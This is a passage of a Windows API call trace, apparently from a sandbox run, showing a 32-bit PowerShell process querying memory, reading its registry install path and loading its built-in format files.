dwLength=0x1c | out: lpBuffer=0x23e504*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.079] VirtualQuery (in: lpAddress=0x23d504, lpBuffer=0x23e504, dwLength=0x1c | out: lpBuffer=0x23e504*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.079] VirtualQuery (in: lpAddress=0x23d504, lpBuffer=0x23e504, dwLength=0x1c | out: lpBuffer=0x23e504*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.080] VirtualQuery (in: lpAddress=0x23d504, lpBuffer=0x23e504, dwLength=0x1c | out: lpBuffer=0x23e504*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.080] VirtualQuery (in: lpAddress=0x23d504, lpBuffer=0x23e504, dwLength=0x1c | out: lpBuffer=0x23e504*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.080] VirtualQuery (in: lpAddress=0x23d504, lpBuffer=0x23e504, dwLength=0x1c | out: lpBuffer=0x23e504*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.081] VirtualQuery (in: lpAddress=0x23d504, lpBuffer=0x23e504, dwLength=0x1c | out: lpBuffer=0x23e504*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.085] VirtualQuery (in: lpAddress=0x23d504, lpBuffer=0x23e504, dwLength=0x1c | out: lpBuffer=0x23e504*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.088] VirtualQuery (in: lpAddress=0x23d504, lpBuffer=0x23e504, dwLength=0x1c | out: lpBuffer=0x23e504*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.088] VirtualQuery (in: lpAddress=0x23d504, lpBuffer=0x23e504, dwLength=0x1c | out: lpBuffer=0x23e504*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.089] VirtualQuery (in: lpAddress=0x23d504, lpBuffer=0x23e504, dwLength=0x1c | out: lpBuffer=0x23e504*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.089] VirtualQuery (in: lpAddress=0x23d504, lpBuffer=0x23e504, dwLength=0x1c | out: lpBuffer=0x23e504*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.090] VirtualQuery (in: lpAddress=0x23d504, lpBuffer=0x23e504, dwLength=0x1c | out: lpBuffer=0x23e504*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.091] VirtualQuery (in: lpAddress=0x23d504, lpBuffer=0x23e504, dwLength=0x1c | out: lpBuffer=0x23e504*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.091] VirtualQuery (in: lpAddress=0x23d504, lpBuffer=0x23e504, dwLength=0x1c | out: lpBuffer=0x23e504*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.091] VirtualQuery (in: lpAddress=0x23d504, lpBuffer=0x23e504, dwLength=0x1c | out: lpBuffer=0x23e504*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.091] VirtualQuery (in: lpAddress=0x23d504, lpBuffer=0x23e504, dwLength=0x1c | out: lpBuffer=0x23e504*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.092] VirtualQuery (in: lpAddress=0x23d504, lpBuffer=0x23e504, dwLength=0x1c | out: lpBuffer=0x23e504*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.092] VirtualQuery (in: lpAddress=0x23d504, lpBuffer=0x23e504, dwLength=0x1c | out: lpBuffer=0x23e504*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.092] VirtualQuery (in: lpAddress=0x23d504, lpBuffer=0x23e504, dwLength=0x1c | out: lpBuffer=0x23e504*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.092] VirtualQuery (in: lpAddress=0x23d504, lpBuffer=0x23e504, dwLength=0x1c | out: lpBuffer=0x23e504*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.094] VirtualQuery (in: lpAddress=0x23d504, lpBuffer=0x23e504, dwLength=0x1c | out: lpBuffer=0x23e504*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.097] VirtualQuery (in: lpAddress=0x23d508, lpBuffer=0x23e508, dwLength=0x1c | out: lpBuffer=0x23e508*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.097] VirtualQuery (in: lpAddress=0x23d508, lpBuffer=0x23e508, dwLength=0x1c | out: lpBuffer=0x23e508*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.097] VirtualQuery (in: lpAddress=0x23d504, lpBuffer=0x23e504, dwLength=0x1c | out: lpBuffer=0x23e504*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.099] VirtualQuery (in: lpAddress=0x23d504, lpBuffer=0x23e504, dwLength=0x1c | out: lpBuffer=0x23e504*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.264] VirtualQuery (in: lpAddress=0x23d504, lpBuffer=0x23e504, dwLength=0x1c | out: lpBuffer=0x23e504*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.265] VirtualQuery (in: lpAddress=0x23d504, lpBuffer=0x23e504, dwLength=0x1c | out: lpBuffer=0x23e504*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.265] VirtualQuery (in: lpAddress=0x23d504, lpBuffer=0x23e504, dwLength=0x1c | out: lpBuffer=0x23e504*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.280] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0151.280] GetLastError () returned 0xcb [0151.291] VirtualQuery (in: lpAddress=0x23d504, lpBuffer=0x23e504, dwLength=0x1c | out: lpBuffer=0x23e504*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.302] VirtualQuery (in: lpAddress=0x23d504, lpBuffer=0x23e504, dwLength=0x1c | out: lpBuffer=0x23e504*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.303] VirtualQuery (in: lpAddress=0x23d504, lpBuffer=0x23e504, dwLength=0x1c | out: lpBuffer=0x23e504*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.303] VirtualQuery (in: lpAddress=0x23d504, lpBuffer=0x23e504, dwLength=0x1c | out: lpBuffer=0x23e504*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.303] VirtualQuery (in: lpAddress=0x23d504, lpBuffer=0x23e504, dwLength=0x1c | out: lpBuffer=0x23e504*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.305] VirtualQuery (in: lpAddress=0x23d504, lpBuffer=0x23e504, dwLength=0x1c | out: lpBuffer=0x23e504*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.305] VirtualQuery (in: lpAddress=0x23d504, lpBuffer=0x23e504, dwLength=0x1c | out: lpBuffer=0x23e504*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.308] VirtualQuery (in: lpAddress=0x23d504, lpBuffer=0x23e504, dwLength=0x1c | out: lpBuffer=0x23e504*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.310] VirtualQuery (in: lpAddress=0x23d504, lpBuffer=0x23e504, dwLength=0x1c | out: lpBuffer=0x23e504*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.316] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e68c | out: phkResult=0x23e68c*=0x34c) returned 0x0 [0151.316] RegQueryValueExW (in: hKey=0x34c, lpValueName="path", lpReserved=0x0, lpType=0x23e6f4, lpData=0x0, lpcbData=0x23e6f0*=0x0 | out: lpType=0x23e6f4*=0x1, lpData=0x0, lpcbData=0x23e6f0*=0x74) returned 0x0 [0151.316] RegQueryValueExW (in: hKey=0x34c, lpValueName="path", lpReserved=0x0, lpType=0x23e6d4, lpData=0x0, lpcbData=0x23e6d0*=0x0 | out: lpType=0x23e6d4*=0x1, lpData=0x0, lpcbData=0x23e6d0*=0x74) returned 0x0 [0151.317] RegQueryValueExW (in: hKey=0x34c, lpValueName="path", lpReserved=0x0, lpType=0x23e6d4, lpData=0x357e88, lpcbData=0x23e6d0*=0x74 | out: lpType=0x23e6d4*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x23e6d0*=0x74) returned 0x0 [0151.317] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x23e254, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a [0151.317] GetLastError () returned 0xcb [0151.317] SetErrorMode (uMode=0x1) returned 0x1 [0151.317] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x23e6d4 | out: lpFileInformation=0x23e6d4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0151.317] GetLastError () returned 0xcb [0151.317] SetErrorMode (uMode=0x1) returned 0x1 [0151.319] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x23e248, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0151.319] GetLastError () returned 0xcb [0151.319] SetErrorMode (uMode=0x1) returned 0x1 [0151.319] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x23e6c8 | out: lpFileInformation=0x23e6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a02ba41, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a02ba41, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e5e3fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1 [0151.319] GetLastError () returned 0xcb [0151.320] SetErrorMode (uMode=0x1) returned 0x1 [0151.320] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x23e248, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0151.320] GetLastError () returned 0xcb [0151.320] SetErrorMode (uMode=0x1) returned 0x1 [0151.320] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x23e6c8 | out: lpFileInformation=0x23e6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1f4ab5, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1f4ab5, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd374b67c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1 [0151.320] GetLastError () returned 0xcb [0151.320] SetErrorMode (uMode=0x1) returned 0x1 [0151.320] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x23e248, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0151.320] GetLastError () returned 0xcb [0151.320] SetErrorMode (uMode=0x1) returned 0x1 [0151.320] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x23e6c8 | out: lpFileInformation=0x23e6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a051ba0, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a051ba0, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2d2d8fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1 [0151.320] GetLastError () returned 0xcb [0151.320] SetErrorMode (uMode=0x1) returned 0x1 [0151.320] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x23e248, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0151.320] GetLastError () returned 0xcb [0151.321] SetErrorMode (uMode=0x1) returned 0x1 [0151.321] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x23e6c8 | out: lpFileInformation=0x23e6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a077cff, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a077cff, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e8455c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1 [0151.321] GetLastError () returned 0xcb [0151.321] SetErrorMode (uMode=0x1) returned 0x1 [0151.321] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x23e248, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0151.321] GetLastError () returned 0xcb [0151.321] SetErrorMode (uMode=0x1) returned 0x1 [0151.321] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x23e6c8 | out: lpFileInformation=0x23e6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0c3fbd, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0c3fbd, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2eaa6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1 [0151.321] GetLastError () returned 0xcb [0151.321] SetErrorMode (uMode=0x1) returned 0x1 [0151.321] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x23e248, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0151.321] GetLastError () returned 0xcb [0151.321] SetErrorMode (uMode=0x1) returned 0x1 [0151.321] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x23e6c8 | out: lpFileInformation=0x23e6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a11027b, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a11027b, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2ed081c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1 [0151.368] GetLastError () returned 0xcb [0151.368] SetErrorMode (uMode=0x1) returned 0x1 [0151.375] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x23e248, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47 [0151.375] GetLastError () returned 0xcb [0151.375] SetErrorMode (uMode=0x1) returned 0x1 [0151.375] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x23e6c8 | out: lpFileInformation=0x23e6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a182698, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a182698, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd368cf9c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1 [0151.376] GetLastError () returned 0xcb [0151.376] SetErrorMode (uMode=0x1) returned 0x1 [0151.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x23e248, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0151.376] GetLastError () returned 0xcb [0151.376] SetErrorMode (uMode=0x1) returned 0x1 [0151.376] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x23e6c8 | out: lpFileInformation=0x23e6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1a87f7, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1a87f7, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd36b30fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1 [0151.376] GetLastError () returned 0xcb [0151.376] SetErrorMode (uMode=0x1) returned 0x1 [0151.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x23e248, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0151.376] GetLastError () returned 0xcb [0151.376] SetErrorMode (uMode=0x1) returned 0x1 [0151.376] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x23e6c8 | out: lpFileInformation=0x23e6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1ce956, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1ce956, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd372551c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1 [0151.376] GetLastError () returned 0xcb [0151.376] SetErrorMode (uMode=0x1) returned 0x1 [0151.377] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0151.377] GetLastError () returned 0xcb [0151.387] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0151.387] GetLastError () returned 0xcb [0151.389] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0151.389] GetLastError () returned 0xcb [0151.391] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0151.391] GetLastError () returned 0xcb [0151.391] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x23dfdc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0151.391] GetLastError () returned 0xcb [0151.391] SetErrorMode (uMode=0x1) returned 0x1 [0151.392] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c [0151.392] GetLastError () returned 0x0 [0151.392] GetFileType (hFile=0x31c) returned 0x1 [0151.392] SetErrorMode (uMode=0x1) returned 0x1 [0151.392] GetFileType (hFile=0x31c) returned 0x1 [0151.392] ReadFile (in: hFile=0x31c, lpBuffer=0x2d1e58c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d1e58c*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0151.393] GetLastError () returned 0x0 [0151.398] ReadFile (in: hFile=0x31c, lpBuffer=0x2d1e58c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d1e58c*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0151.399] GetLastError () returned 0x0 [0151.399] ReadFile (in: hFile=0x31c, lpBuffer=0x2d1e58c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d1e58c*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0151.399] GetLastError () returned 0x0 [0151.399] ReadFile (in: hFile=0x31c, lpBuffer=0x2d1e58c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d1e58c*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0151.399] GetLastError () returned 0x0 [0151.399] ReadFile (in: hFile=0x31c, lpBuffer=0x2d1e58c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d1e58c*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0151.399] GetLastError () returned 0x0 [0151.399] ReadFile (in: hFile=0x31c, lpBuffer=0x2d1e58c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d1e58c*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0151.399] GetLastError () returned 0x0 [0151.399] ReadFile (in: hFile=0x31c, lpBuffer=0x2d1e58c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d1e58c*, lpNumberOfBytesRead=0x23e544*=0x9e2, lpOverlapped=0x0) returned 1 [0151.400] GetLastError () returned 0x0 [0151.400] ReadFile (in: hFile=0x31c, lpBuffer=0x2d1db0e, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d1db0e*, lpNumberOfBytesRead=0x23e544*=0x0, 